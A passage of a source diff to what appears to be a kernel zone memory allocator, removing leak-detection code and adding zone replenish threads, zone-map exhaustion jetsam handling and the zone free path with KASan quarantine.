-       zleak_state |= ZLEAK_STATE_ACTIVATING;
-       lck_spin_unlock(&zleak_lock);
-
-       /* Allocate and zero tables */
-       retval = kmem_alloc_kobject(kernel_map, (vm_offset_t*)&allocations_ptr, z_alloc_size, VM_KERN_MEMORY_OSFMK);
-       if (retval != KERN_SUCCESS) {
-               goto fail;
+       if (zone->exhaustible) {
+               return false;
        }
-
-       retval = kmem_alloc_kobject(kernel_map, (vm_offset_t*)&traces_ptr, z_trace_size, VM_KERN_MEMORY_OSFMK);
-       if (retval != KERN_SUCCESS) {
-               goto fail;
+       if (zone->expandable) {
+               /*
+                * If we're expandable, just don't go through this again.
+                */
+               zone->z_wired_max = ~0u;
+               return true;
        }
+       zone_unlock(zone);
 
-       bzero(allocations_ptr, z_alloc_size);
-       bzero(traces_ptr, z_trace_size);
-
-       /* Everything's set.  Install tables, mark active. */
-       zallocations = allocations_ptr;
-       ztraces = traces_ptr;
-
-       /*
-        * Initialize the top_ztrace to the first entry in ztraces,
-        * so we don't have to check for null in zleak_log
-        */
-       top_ztrace = &ztraces[0];
+       panic_include_zprint = true;
+#if CONFIG_ZLEAKS
+       if (zleak_state & ZLEAK_STATE_ACTIVE) {
+               panic_include_ztrace = true;
+       }
+#endif /* CONFIG_ZLEAKS */
+       panic("zone '%s%s' exhausted", zone_heap_name(zone), zone_name(zone));
+}
 
-       /*
-        * Note that we do need a barrier between installing
-        * the tables and setting the active flag, because the zfree()
-        * path accesses the table without a lock if we're active.
-        */
-       lck_spin_lock(&zleak_lock);
-       zleak_state |= ZLEAK_STATE_ACTIVE;
-       zleak_state &= ~ZLEAK_STATE_ACTIVATING;
-       lck_spin_unlock(&zleak_lock);
+static void
+zone_expand_async(__unused thread_call_param_t p0, __unused thread_call_param_t p1)
+{
+       zone_foreach(z) {
+               if (z->no_callout) {
+                       /* z_async_refilling will never be set */
+                       continue;
+               }
 
-       return 0;
+               if (z->z_replenishes) {
+                       /* those use the zone_replenish_thread */
+                       continue;
+               }
 
-fail:
-       /*
-        * If we fail to allocate memory, don't further tax
-        * the system by trying again.
-        */
-       lck_spin_lock(&zleak_lock);
-       zleak_state |= ZLEAK_STATE_FAILED;
-       zleak_state &= ~ZLEAK_STATE_ACTIVATING;
-       lck_spin_unlock(&zleak_lock);
+               zone_lock(z);
+               if (z->z_self && z->z_async_refilling) {
+                       z->z_async_refilling = false;
+                       zone_expand_locked(z, Z_WAITOK, zalloc_needs_refill);
+               }
+               zone_unlock(z);
+       }
+}
 
-       if (allocations_ptr != NULL) {
-               kmem_free(kernel_map, (vm_offset_t)allocations_ptr, z_alloc_size);
+static inline void
+zone_expand_async_schedule_if_needed(zone_t zone)
+{
+       if (zone->z_elems_free > zone->z_elems_rsv || zone->z_async_refilling ||
+           zone->no_callout) {
+               return;
        }
 
-       if (traces_ptr != NULL) {
-               kmem_free(kernel_map, (vm_offset_t)traces_ptr, z_trace_size);
+       if (!zone->expandable && zone->z_wired_cur >= zone->z_wired_max) {
+               return;
        }
 
-       return retval;
+       if (zone->z_elems_free == 0 || !vm_pool_low()) {
+               zone->z_async_refilling = true;
+               thread_call_enter(&zone_expand_callout);
+       }
 }
 
-/*
- * TODO: What about allocations that never get deallocated,
- * especially ones with unique backtraces? Should we wait to record
- * until after boot has completed?
- * (How many persistent zallocs are there?)
- */
+#endif /* !ZALLOC_TEST */
+#pragma mark zone replenishing (VM allocations)
+#if !ZALLOC_TEST
 
 /*
- * This function records the allocation in the allocations table,
- * and stores the associated backtrace in the traces table
- * (or just increments the refcount if the trace is already recorded)
- * If the allocation slot is in use, the old allocation is replaced with the new allocation, and
- * the associated trace's refcount is decremented.
- * If the trace slot is in use, it returns.
- * The refcount is incremented by the amount of memory the allocation consumes.
- * The return value indicates whether to try again next time.
+ * Tracks how many zone_replenish threads are active, because zone_gc() wants
+ * for those to be finished before it proceeds.
+ *
+ * This counts how many replenish threads are active in
+ * ZONE_REPLENISH_ACTIVE_INC increments,
+ * and uses the low bit to track if there are any waiters.
  */
-static boolean_t
-zleak_log(uintptr_t* bt,
-    uintptr_t addr,
-    uint32_t depth,
-    vm_size_t allocation_size)
+#define ZONE_REPLENISH_ACTIVE_NONE        0u
+#define ZONE_REPLENISH_ACTIVE_WAITER_BIT  1u
+#define ZONE_REPLENISH_ACTIVE_INC         2u
+#define ZONE_REPLENISH_ACTIVE_MASK        (~ZONE_REPLENISH_ACTIVE_WAITER_BIT)
+static unsigned _Atomic zone_replenish_active;
+static unsigned zone_replenish_wakeups;
+static unsigned zone_replenish_wakeups_initiated;
+static unsigned zone_replenish_throttle_count;
+
+#define ZONE_REPLENISH_TARGET (16 * 1024)
+
+static void
+zone_replenish_wait_if_needed(void)
 {
-       /* Quit if there's someone else modifying the hash tables */
-       if (!lck_spin_try_lock(&zleak_lock)) {
-               z_total_conflicts++;
-               return FALSE;
+       /*
+        * This check can be racy, the reserves ought to be enough
+        * to compensate for a little race
+        */
+       while (os_atomic_load(&zone_replenish_active, relaxed) !=
+           ZONE_REPLENISH_ACTIVE_NONE) {
+               unsigned o_active, n_active;
+
+               assert_wait(&zone_replenish_active, THREAD_UNINT);
+
+               os_atomic_rmw_loop(&zone_replenish_active, o_active, n_active, relaxed, {
+                       if (o_active == ZONE_REPLENISH_ACTIVE_NONE) {
+                               os_atomic_rmw_loop_give_up({
+                                       clear_wait(current_thread(), THREAD_AWAKENED);
+                                       return;
+                               });
+                       }
+                       if (o_active & ZONE_REPLENISH_ACTIVE_WAITER_BIT) {
+                               os_atomic_rmw_loop_give_up(break);
+                       }
+                       n_active = o_active | ZONE_REPLENISH_ACTIVE_WAITER_BIT;
+               });
+               thread_block(THREAD_CONTINUE_NULL);
        }
+}
 
-       struct zallocation* allocation  = &zallocations[hashaddr(addr, zleak_alloc_buckets)];
-
-       uint32_t trace_index = hashbacktrace(bt, depth, zleak_trace_buckets);
-       struct ztrace* trace = &ztraces[trace_index];
+__attribute__((noinline))
+static void
+zone_replenish_locked(zone_t zone)
+{
+       thread_t thr = current_thread();
+       uint32_t min_free;
 
-       allocation->za_hit_count++;
-       trace->zt_hit_count++;
+       zone_replenish_wakeups++;
 
        /*
-        * If the allocation bucket we want to be in is occupied, and if the occupier
-        * has the same trace as us, just bail.
+        * We'll let threads continue to allocate under the reserve:
+        * - until it depleted to 50% for regular threads,
+        * - until it depleted to 25% for VM_PRIV threads.
+        *
+        * After that only TH_OPT_ZONE_PRIV threads may continue.
         */
-       if (allocation->za_element != (uintptr_t) 0 && trace_index == allocation->za_trace_index) {
-               z_alloc_collisions++;
-
-               lck_spin_unlock(&zleak_lock);
-               return TRUE;
+       if (thr->options & TH_OPT_VMPRIV) {
+               min_free = zone->z_elems_rsv / 4;
+       } else {
+               min_free = zone->z_elems_rsv / 2;
        }
 
-       /* STEP 1: Store the backtrace in the traces array. */
-       /* A size of zero indicates that the trace bucket is free. */
-
-       if (trace->zt_size > 0 && bcmp(trace->zt_stack, bt, (depth * sizeof(uintptr_t))) != 0) {
+       while (zone->z_elems_free <= zone->z_elems_rsv) {
                /*
-                * Different unique trace with same hash!
-                * Just bail - if we're trying to record the leaker, hopefully the other trace will be deallocated
-                * and get out of the way for later chances
+                * Wakeup the replenish thread if not running.
                 */
-               trace->zt_collisions++;
-               z_trace_collisions++;
-
-               lck_spin_unlock(&zleak_lock);
-               return TRUE;
-       } else if (trace->zt_size > 0) {
-               /* Same trace, already added, so increment refcount */
-               trace->zt_size += allocation_size;
-       } else {
-               /* Found an unused trace bucket, record the trace here! */
-               if (trace->zt_depth != 0) { /* if this slot was previously used but not currently in use */
-                       z_trace_overwrites++;
+               if (!zone->z_async_refilling) {
+                       os_atomic_add(&zone_replenish_active,
+                           ZONE_REPLENISH_ACTIVE_INC, relaxed);
+                       zone->z_async_refilling = true;
+                       zone_replenish_wakeups_initiated++;
+                       thread_wakeup(&zone->z_elems_rsv);
                }
 
-               z_trace_recorded++;
-               trace->zt_size                  = allocation_size;
-               memcpy(trace->zt_stack, bt, (depth * sizeof(uintptr_t)));
-
-               trace->zt_depth         = depth;
-               trace->zt_collisions    = 0;
-       }
-
-       /* STEP 2: Store the allocation record in the allocations array. */
+               if (zone->z_elems_free > min_free) {
+                       break;
+               }
 
-       if (allocation->za_element != (uintptr_t) 0) {
                /*
-                * Straight up replace any allocation record that was there.  We don't want to do the work
-                * to preserve the allocation entries that were there, because we only record a subset of the
-                * allocations anyways.
+                * TH_OPT_ZONE_PRIV threads are the GC thread and a replenish
+                * thread itself.
+                *
+                * Replenish threads *need* to use the reserve. GC threads need
+                * to get through the current allocation, but then will wait at
+                * a higher level after they've dropped any locks which would
+                * deadlock the replenish thread.
+                *
+                * The value of (refill_level / 2) in the previous bit of code
+                * should have given us headroom even though this thread didn't
+                * wait.
                 */
+               if (thr->options & TH_OPT_ZONE_PRIV) {
+                       assert(zone->z_elems_free != 0);
+                       break;
+               }
 
-               z_alloc_collisions++;
-
-               struct ztrace* associated_trace = &ztraces[allocation->za_trace_index];
-               /* Knock off old allocation's size, not the new allocation */
-               associated_trace->zt_size -= allocation->za_size;
-       } else if (allocation->za_trace_index != 0) {
-               /* Slot previously used but not currently in use */
-               z_alloc_overwrites++;
-       }
-
-       allocation->za_element          = addr;
-       allocation->za_trace_index      = trace_index;
-       allocation->za_size             = allocation_size;
+               if (startup_phase < STARTUP_SUB_MACH_IPC) {
+                       panic("vm_map_steal_memory didn't steal enough memory: "
+                           "trying to grow [%s%s] before the scheduler has started",
+                           zone_heap_name(zone), zone_name(zone));
+               }
 
-       z_alloc_recorded++;
+               /*
+                * Wait for the replenish threads to add more elements
+                * for us to allocate from.
+                */
+               zone_replenish_throttle_count++;
+               zone->z_replenish_wait = true;
+               assert_wait_timeout(zone, THREAD_UNINT, 1, NSEC_PER_MSEC);
+               zone_unlock(zone);
+               thread_block(THREAD_CONTINUE_NULL);
+               zone_lock(zone);
+               zone->z_replenish_wait = false;
 
-       if (top_ztrace->zt_size < trace->zt_size) {
-               top_ztrace = trace;
+               assert(zone->z_self == zone);
        }
+}
 
-       lck_spin_unlock(&zleak_lock);
-       return TRUE;
+static bool
+zone_replenish_needed(zone_t z)
+{
+       return z->z_elems_free <= z->z_elems_rsv;
 }
 
 /*
- * Free the allocation record and release the stacktrace.
- * This should be as fast as possible because it will be called for every free.
+ * High priority VM privileged thread used to asynchronously refill a given zone.
+ * These are needed for data structures used by the lower level VM itself. The
+ * replenish thread maintains a reserve of elements, so that the VM will never
+ * block in the zone allocator.
  */
-__attribute__((noinline))
+__dead2
 static void
-zleak_free(uintptr_t addr,
-    vm_size_t allocation_size)
+zone_replenish_thread(void *_z, wait_result_t __unused wr)
 {
-       if (addr == (uintptr_t) 0) {
-               return;
+       unsigned o_active, n_active;
+       zone_t z = _z;
+
+       zone_lock(z);
+       assert(z->z_self == z);
+       assert(z->z_async_refilling && z->z_replenishes);
+
+       zone_expand_locked(z, Z_WAITOK, zone_replenish_needed);
+
+       if (z->z_replenish_wait) {
+               /* Wakeup any potentially throttled allocations */
+               z->z_replenish_wait = false;
+               thread_wakeup(z);
        }
 
-       struct zallocation* allocation = &zallocations[hashaddr(addr, zleak_alloc_buckets)];
+       /* wakeup zone_reclaim() callers that were possibly waiting */
+       os_atomic_rmw_loop(&zone_replenish_active, o_active, n_active, relaxed, {
+               if (os_sub_overflow(o_active, ZONE_REPLENISH_ACTIVE_INC, &n_active)) {
+                       panic("zone_replenish_active corrupt: %d", o_active);
+               }
+               if ((n_active & ZONE_REPLENISH_ACTIVE_MASK) == 0) {
+                       n_active = ZONE_REPLENISH_ACTIVE_NONE;
+               }
+       });
 
-       /* Double-checked locking: check to find out if we're interested, lock, check to make
-        * sure it hasn't changed, then modify it, and release the lock.
-        */
+       if (n_active == ZONE_REPLENISH_ACTIVE_NONE &&
+           (o_active & ZONE_REPLENISH_ACTIVE_WAITER_BIT)) {
+               thread_wakeup(&zone_replenish_active);
+       }
 
-       if (allocation->za_element == addr && allocation->za_trace_index < zleak_trace_buckets) {
-               /* if the allocation was the one, grab the lock, check again, then delete it */
-               lck_spin_lock(&zleak_lock);
+       z->z_async_refilling = false;
+       assert_wait(&z->z_elems_rsv, THREAD_UNINT);
 
-               if (allocation->za_element == addr && allocation->za_trace_index < zleak_trace_buckets) {
-                       struct ztrace *trace;
+       zone_unlock(z);
 
-                       /* allocation_size had better match what was passed into zleak_log - otherwise someone is freeing into the wrong zone! */
-                       if (allocation->za_size != allocation_size) {
-                               panic("Freeing as size %lu memory that was allocated with size %lu\n",
-                                   (uintptr_t)allocation_size, (uintptr_t)allocation->za_size);
-                       }
+       thread_block_parameter(zone_replenish_thread, z);
+       __builtin_unreachable();
+}
 
-                       trace = &ztraces[allocation->za_trace_index];
+void
+zone_replenish_configure(zone_t z)
+{
+       thread_t th;
+       kern_return_t kr;
+       char name[MAXTHREADNAMESIZE];
 
-                       /* size of 0 indicates trace bucket is unused */
-                       if (trace->zt_size > 0) {
-                               trace->zt_size -= allocation_size;
-                       }
+       zone_lock(z);
+       assert(!z->z_replenishes && !z->z_destructible);
+       z->z_elems_rsv = (uint16_t)(ZONE_REPLENISH_TARGET / zone_elem_size(z));
+       z->z_replenishes = true;
+       os_atomic_add(&zone_replenish_active, ZONE_REPLENISH_ACTIVE_INC, relaxed);
+       z->z_async_refilling = true;
+       zone_unlock(z);
 
-                       /* A NULL element means the allocation bucket is unused */
-                       allocation->za_element = 0;
-               }
-               lck_spin_unlock(&zleak_lock);
+       kr = kernel_thread_create(zone_replenish_thread, z, MAXPRI_KERNEL, &th);
+       if (kr != KERN_SUCCESS) {
+               panic("zone_replenish_configure, thread create: 0x%x", kr);
        }
+       /* make sure this thread can't lose its stack */
+       assert(th->reserved_stack == th->kernel_stack);
+
+       snprintf(name, sizeof(name), "z_replenish(%s)", zone_name(z));
+       thread_set_thread_name(th, name);
+
+       thread_mtx_lock(th);
+       th->options |= TH_OPT_VMPRIV | TH_OPT_ZONE_PRIV;
+       thread_start(th);
+       thread_mtx_unlock(th);
+
+       thread_deallocate(th);
 }
 
-#endif /* CONFIG_ZLEAKS */
+/*! @} */
+#endif /* !ZALLOC_TEST */
+#pragma mark zone jetsam integration
+#if !ZALLOC_TEST
 
-/*  These functions outside of CONFIG_ZLEAKS because they are also used in
- *  mbuf.c for mbuf leak-detection.  This is why they lack the z_ prefix.
+/*
+ * We're being very conservative here and picking a value of 95%. We might need to lower this if
+ * we find that we're not catching the problem and are still hitting zone map exhaustion panics.
  */
+#define ZONE_MAP_JETSAM_LIMIT_DEFAULT 95
 
-/* "Thomas Wang's 32/64 bit mix functions."  http://www.concentric.net/~Ttwang/tech/inthash.htm */
-uintptr_t
-hash_mix(uintptr_t x)
+/*
+ * Trigger zone-map-exhaustion jetsams if the zone map is X% full, where X=zone_map_jetsam_limit.
+ * Can be set via boot-arg "zone_map_jetsam_limit". Set to 95% by default.
+ */
+TUNABLE_WRITEABLE(unsigned int, zone_map_jetsam_limit, "zone_map_jetsam_limit",
+    ZONE_MAP_JETSAM_LIMIT_DEFAULT);
+
+void
+get_zone_map_size(uint64_t *current_size, uint64_t *capacity)
 {
-#ifndef __LP64__
-       x += ~(x << 15);
-       x ^=  (x >> 10);
-       x +=  (x << 3);
-       x ^=  (x >> 6);
-       x += ~(x << 11);
-       x ^=  (x >> 16);
-#else
-       x += ~(x << 32);
-       x ^=  (x >> 22);
-       x += ~(x << 13);
-       x ^=  (x >> 8);
-       x +=  (x << 3);
-       x ^=  (x >> 15);
-       x += ~(x << 27);
-       x ^=  (x >> 31);
-#endif
-       return x;
+       vm_offset_t phys_pages = os_atomic_load(&zones_phys_page_mapped_count, relaxed);
+       *current_size = ptoa_64(phys_pages);
+       *capacity = ptoa_64(zone_phys_mapped_max_pages);
 }
 
-uint32_t
-hashbacktrace(uintptr_t* bt, uint32_t depth, uint32_t max_size)
+void
+get_largest_zone_info(char *zone_name, size_t zone_name_len, uint64_t *zone_size)
 {
-       uintptr_t hash = 0;
-       uintptr_t mask = max_size - 1;
+       zone_t largest_zone = zone_find_largest();
 
-       while (depth) {
-               hash += bt[--depth];
+       /*
+        * Append kalloc heap name to zone name (if zone is used by kalloc)
+        */
+       snprintf(zone_name, zone_name_len, "%s%s",
+           zone_heap_name(largest_zone), largest_zone->z_name);
+
+       *zone_size = zone_size_wired(largest_zone);
+}
+
+bool
+zone_map_nearing_exhaustion(void)
+{
+       uint64_t phys_pages = os_atomic_load(&zones_phys_page_mapped_count, relaxed);
+       return phys_pages * 100 > zone_phys_mapped_max_pages * zone_map_jetsam_limit;
+}
+
+
+#define VMENTRY_TO_VMOBJECT_COMPARISON_RATIO 98
+
+/*
+ * Tries to kill a single process if it can attribute one to the largest zone. If not, wakes up the memorystatus thread
+ * to walk through the jetsam priority bands and kill processes.
+ */
+static void
+kill_process_in_largest_zone(void)
+{
+       pid_t pid = -1;
+       zone_t largest_zone = zone_find_largest();
+
+       printf("zone_map_exhaustion: Zone mapped %lld of %lld, used %lld, capacity %lld [jetsam limit %d%%]\n",
+           ptoa_64(os_atomic_load(&zones_phys_page_mapped_count, relaxed)),
+           ptoa_64(zone_phys_mapped_max_pages),
+           (uint64_t)zone_submaps_approx_size(),
+           (uint64_t)(zone_foreign_size() + zone_native_size()),
+           zone_map_jetsam_limit);
+       printf("zone_map_exhaustion: Largest zone %s%s, size %lu\n", zone_heap_name(largest_zone),
+           largest_zone->z_name, (uintptr_t)zone_size_wired(largest_zone));
+
+       /*
+        * We want to make sure we don't call this function from userspace.
+        * Or we could end up trying to synchronously kill the process
+        * whose context we're in, causing the system to hang.
+        */
+       assert(current_task() == kernel_task);
+
+       /*
+        * If vm_object_zone is the largest, check to see if the number of
+        * elements in vm_map_entry_zone is comparable.
+        *
+        * If so, consider vm_map_entry_zone as the largest. This lets us target
+        * a specific process to jetsam to quickly recover from the zone map
+        * bloat.
+        */
+       if (largest_zone == vm_object_zone) {
+               unsigned int vm_object_zone_count = zone_count_allocated(vm_object_zone);
+               unsigned int vm_map_entry_zone_count = zone_count_allocated(vm_map_entry_zone);
+               /* Is the VM map entries zone count >= 98% of the VM objects zone count? */
+               if (vm_map_entry_zone_count >= ((vm_object_zone_count * VMENTRY_TO_VMOBJECT_COMPARISON_RATIO) / 100)) {
+                       largest_zone = vm_map_entry_zone;
+                       printf("zone_map_exhaustion: Picking VM map entries as the zone to target, size %lu\n",
+                           (uintptr_t)zone_size_wired(largest_zone));
+               }
+       }
+
+       /* TODO: Extend this to check for the largest process in other zones as well. */
+       if (largest_zone == vm_map_entry_zone) {
+               pid = find_largest_process_vm_map_entries();
+       } else {
+               printf("zone_map_exhaustion: Nothing to do for the largest zone [%s%s]. "
+                   "Waking up memorystatus thread.\n", zone_heap_name(largest_zone),
+                   largest_zone->z_name);
        }
+       if (!memorystatus_kill_on_zone_map_exhaustion(pid)) {
+               printf("zone_map_exhaustion: Call to memorystatus failed, victim pid: %d\n", pid);
+       }
+}
 
-       hash = hash_mix(hash) & mask;
-
-       assert(hash < max_size);
+#endif /* !ZALLOC_TEST */
+#pragma mark zfree
+#if !ZALLOC_TEST
+#if KASAN_ZALLOC
 
-       return (uint32_t) hash;
-}
+/*!
+ * @defgroup zfree
+ * @{
+ *
+ * @brief
+ * The codepath for zone frees.
+ *
+ * @discussion
+ * There are 4 major ways to allocate memory that end up in the zone allocator:
+ * - @c zfree()
+ * - @c zfree_percpu()
+ * - @c kfree*()
+ * - @c zfree_permanent()
+ *
+ * While permanent zones have their own allocation scheme, all other codepaths
+ * will eventually go through the @c zfree_ext() choking point.
+ *
+ * Ignoring the @c gzalloc_free() codepath, the decision tree looks like this:
+ * <code>
+ * zfree_ext()
+ *      â”œâ”€â”€â”€> zfree_cached() â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â•®
+ *      â”‚       â”‚                            â”‚
+ *      â”‚       â”‚                            â”‚
+ *      â”‚       â”œâ”€â”€â”€> zfree_cached_slow() â”€â”€â”€â”¤
+ *      â”‚       â”‚            â”‚               â”‚
+ *      â”‚       â”‚            v               â”‚
+ *      â•°â”€â”€â”€â”€â”€â”€â”€â”´â”€â”€â”€> zfree_item() â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”´â”€â”€â”€>
+ * </code>
+ *
+ * @c zfree_ext() takes care of all the generic work to perform on an element
+ * before it is freed (zeroing, logging, tagging, ...) then will hand it off to:
+ * - @c zfree_item() if zone caching is off
+ * - @c zfree_cached() if zone caching is on.
+ *
+ * @c zfree_cached can take a number of decisions:
+ * - a fast path if the (f) or (a) magazines have space (preemption disabled),
+ * - using the cpu local or recirculation depot calling @c zfree_cached_slow(),
+ * - falling back to @c zfree_item() when CPU caching has been disabled.
+ */
 
 /*
- *  TODO: Determine how well distributed this is
- *      max_size must be a power of 2. i.e 0x10000 because 0x10000-1 is 0x0FFFF which is a great bitmask
+ * Called from zfree() to add the element being freed to the KASan quarantine.
+ *
+ * Returns true if the newly-freed element made it into the quarantine without
+ * displacing another, false otherwise. In the latter case, addrp points to the
+ * address of the displaced element, which will be freed by the zone.
  */
-uint32_t
-hashaddr(uintptr_t pt, uint32_t max_size)
+static bool
+kasan_quarantine_freed_element(
+       zone_t          *zonep,         /* the zone the element is being freed to */
+       void            **addrp)        /* address of the element being freed */
 {
-       uintptr_t hash = 0;
-       uintptr_t mask = max_size - 1;
-
-       hash = hash_mix(pt) & mask;
+       zone_t zone = *zonep;
+       void *addr = *addrp;
 
-       assert(hash < max_size);
+       /*
+        * Resize back to the real allocation size and hand off to the KASan
+        * quarantine. `addr` may then point to a different allocation, if the
+        * current element replaced another in the quarantine. The zone then
+        * takes ownership of the swapped out free element.
+        */
+       vm_size_t usersz = zone_elem_size(zone) - 2 * zone->z_kasan_redzone;
+       vm_size_t sz = usersz;
 
-       return (uint32_t) hash;
+       if (addr && zone->z_kasan_redzone) {
+               kasan_check_free((vm_address_t)addr, usersz, KASAN_HEAP_ZALLOC);
+               addr = (void *)kasan_dealloc((vm_address_t)addr, &sz);
+               assert(sz == zone_elem_size(zone));
+       }
+       if (addr && !zone->kasan_noquarantine) {
+               kasan_free(&addr, &sz, KASAN_HEAP_ZALLOC, zonep, usersz, true);
+               if (!addr) {
+                       return TRUE;
+               }
+       }
+       if (addr && zone->kasan_noquarantine) {
+               kasan_unpoison(addr, zone_elem_size(zone));
+       }
+       *addrp = addr;
+       return FALSE;
 }
 
-/* End of all leak-detection code */
-#pragma mark zone creation, configuration, destruction
+#endif /* KASAN_ZALLOC */
 
-static zone_t
-zone_init_defaults(zone_id_t zid)
+__header_always_inline void
+zfree_drop(zone_t zone, struct zone_page_metadata *meta, zone_element_t ze,
+    bool recirc)
 {
-       zone_t z = &zone_array[zid];
-
-       z->page_count_max = ~0u;
-       z->collectable = true;
-       z->expandable = true;
-       z->submap_idx = Z_SUBMAP_IDX_GENERAL_MAP;
+       vm_offset_t esize = zone_elem_size(zone);
 
-       simple_lock_init(&z->lock, 0);
+       if (zone_meta_mark_free(meta, ze) == recirc) {
+               zone_meta_double_free_panic(zone, ze, __func__);
+       }
 
-       return z;
-}
+       vm_offset_t old_size = meta->zm_alloc_size;
+       vm_offset_t max_size = ptoa(meta->zm_chunk_len) + ZM_ALLOC_SIZE_LOCK;
+       vm_offset_t new_size = zone_meta_alloc_size_sub(zone, meta, esize);
 
-static bool
-zone_is_initializing(zone_t z)
-{
-       return !z->z_self && !z->destroyed;
+       if (new_size == 0) {
+               /* whether the page was on the intermediate or all_used, queue, move it to free */
+               zone_meta_requeue(zone, &zone->z_pageq_empty, meta);
+               zone->z_wired_empty += meta->zm_chunk_len;
+       } else if (old_size + esize > max_size) {
+               /* first free element on page, move from all_used */
+               zone_meta_requeue(zone, &zone->z_pageq_partial, meta);
+       }
 }
 
 static void
-zone_set_max(zone_t z, vm_size_t max)
+zfree_item(zone_t zone, struct zone_page_metadata *meta, zone_element_t ze)
 {
-#if KASAN_ZALLOC
-       if (z->kasan_redzone) {
-               /*
-                * Adjust the max memory for the kasan redzones
-                */
-               max += (max / z->pcpu_elem_size) * z->kasan_redzone * 2;
-       }
-#endif
-       if (max < z->percpu ? 1 : z->alloc_pages) {
-               max = z->percpu ? 1 : z->alloc_pages;
-       } else {
-               max = atop(round_page(max));
-       }
-       z->page_count_max = max;
-}
+       /* transfer preemption count to lock */
+       zone_lock_nopreempt_check_contention(zone, NULL);
 
-void
-zone_set_submap_idx(zone_t zone, unsigned int sub_map_idx)
-{
-       if (!zone_is_initializing(zone)) {
-               panic("%s: called after zone_create()", __func__);
-       }
-       if (sub_map_idx > zone_last_submap_idx) {
-               panic("zone_set_submap_idx(%d) > %d", sub_map_idx, zone_last_submap_idx);
-       }
-       zone->submap_idx = sub_map_idx;
+       zfree_drop(zone, meta, ze, false);
+       zone_elems_free_add(zone, 1);
+
+       zone_unlock(zone);
 }
 
-void
-zone_set_noexpand(
-       zone_t          zone,
-       vm_size_t       max)
+__attribute__((noinline))
+static void
+zfree_cached_slow(zone_t zone, struct zone_page_metadata *meta,
+    zone_element_t ze, zone_cache_t cache)
 {
-       if (!zone_is_initializing(zone)) {
-               panic("%s: called after zone_create()", __func__);
+       struct zone_depot mags = STAILQ_HEAD_INITIALIZER(mags);
+       zone_magazine_t mag = NULL;
+       uint16_t n = 0;
+
+       if (zone_meta_is_free(meta, ze)) {
+               zone_meta_double_free_panic(zone, ze, __func__);
        }
-       zone->expandable = false;
-       zone_set_max(zone, max);
-}
 
-void
-zone_set_exhaustible(
-       zone_t          zone,
-       vm_size_t       max)
-{
-       if (!zone_is_initializing(zone)) {
-               panic("%s: called after zone_create()", __func__);
+       if (zone == zc_magazine_zone) {
+               mag = (zone_magazine_t)zone_element_addr(ze,
+                   zone_elem_size(zone));
+#if KASAN_ZALLOC
+               kasan_poison_range((vm_offset_t)mag, zone_elem_size(zone),
+                   ASAN_VALID);
+#endif
+       } else {
+               mag = zone_magazine_alloc(Z_NOWAIT);
+               if (__improbable(mag == NULL)) {
+                       return zfree_item(zone, meta, ze);
+               }
+               mag->zm_cur = 1;
+               mag->zm_elems[0] = ze;
        }
-       zone->expandable = false;
-       zone->exhaustible = true;
-       zone_set_max(zone, max);
-}
 
-/**
- * @function zone_create_find
- *
- * @abstract
- * Finds an unused zone for the given name and element size.
- *
- * @param name          the zone name
- * @param size          the element size (including redzones, ...)
- * @param flags         the flags passed to @c zone_create*
- * @param zid           the desired zone ID or ZONE_ID_ANY
- *
- * @returns             a zone to initialize further.
- */
-static zone_t
-zone_create_find(
-       const char             *name,
-       vm_size_t               size,
-       zone_create_flags_t     flags,
-       zone_id_t               zid)
-{
-       zone_id_t nzones;
-       zone_t z;
+       mag = zone_magazine_replace(&cache->zc_free_cur,
+           &cache->zc_free_elems, mag);
 
-       simple_lock(&all_zones_lock, &zone_locks_grp);
+       z_debug_assert(cache->zc_free_cur <= 1);
+       z_debug_assert(mag->zm_cur == zc_mag_size());
 
-       nzones = (zone_id_t)os_atomic_load(&num_zones, relaxed);
-       assert(num_zones_in_use <= nzones && nzones < MAX_ZONES);
+       STAILQ_INSERT_HEAD(&mags, mag, zm_link);
+       n = 1;
 
-       if (__improbable(nzones < ZONE_ID__FIRST_DYNAMIC)) {
+       if (cache->zc_depot_max >= 2 * zc_mag_size()) {
                /*
-                * The first time around, make sure the reserved zone IDs
-                * have an initialized lock as zone_index_foreach() will
-                * enumerate them.
+                * If we can use the local depot (zc_depot_max allows for
+                * 2 magazines worth of elements) then:
+                *
+                * 1. if we have space for an extra depot locally,
+                *    push it, and leave.
+                *
+                * 2. if we overflow, then take (1 / zc_recirc_denom)
+                *    of the depot out, in order to migrate it to the
+                *    recirculation depot.
                 */
-               while (nzones < ZONE_ID__FIRST_DYNAMIC) {
-                       zone_init_defaults(nzones++);
-               }
-
-               os_atomic_store(&num_zones, nzones, release);
-       }
+               zone_depot_lock_nopreempt(cache);
 
-       if (zid != ZONE_ID_ANY) {
-               if (zid >= ZONE_ID__FIRST_DYNAMIC) {
-                       panic("zone_create: invalid desired zone ID %d for %s",
-                           zid, name);
+               if ((cache->zc_depot_cur + 2) * zc_mag_size() <=
+                   cache->zc_depot_max) {
+                       cache->zc_depot_cur++;
+                       STAILQ_INSERT_TAIL(&cache->zc_depot, mag, zm_link);
+                       return zone_depot_unlock(cache);
                }
-               if (flags & ZC_DESTRUCTIBLE) {
-                       panic("zone_create: ID %d (%s) must be permanent", zid, name);
-               }
-               if (zone_array[zid].z_self) {
-                       panic("zone_create: creating zone ID %d (%s) twice", zid, name);
+
+               while (zc_recirc_denom * cache->zc_depot_cur * zc_mag_size() >=
+                   (zc_recirc_denom - 1) * cache->zc_depot_max) {
+                       mag = STAILQ_FIRST(&cache->zc_depot);
+                       STAILQ_REMOVE_HEAD(&cache->zc_depot, zm_link);
+                       STAILQ_INSERT_TAIL(&mags, mag, zm_link);
+                       cache->zc_depot_cur--;
+                       n++;
                }
-               z = &zone_array[zid];
+
+               zone_depot_unlock(cache);
        } else {
-               if (flags & ZC_DESTRUCTIBLE) {
-                       /*
-                        * If possible, find a previously zdestroy'ed zone in the
-                        * zone_array that we can reuse.
-                        */
-                       for (int i = bitmap_first(zone_destroyed_bitmap, MAX_ZONES);
-                           i >= 0; i = bitmap_next(zone_destroyed_bitmap, i)) {
-                               z = &zone_array[i];
+               enable_preemption();
+       }
 
-                               /*
-                                * If the zone name and the element size are the
-                                * same, we can just reuse the old zone struct.
-                                */
-                               if (strcmp(z->z_name, name) || zone_elem_size(z) != size) {
-                                       continue;
-                               }
-                               bitmap_clear(zone_destroyed_bitmap, i);
-                               z->destroyed = false;
-                               z->z_self = z;
-                               zid = (zone_id_t)i;
-                               goto out;
-                       }
+       /*
+        * Preflight validity of all the elements before we touch the zone
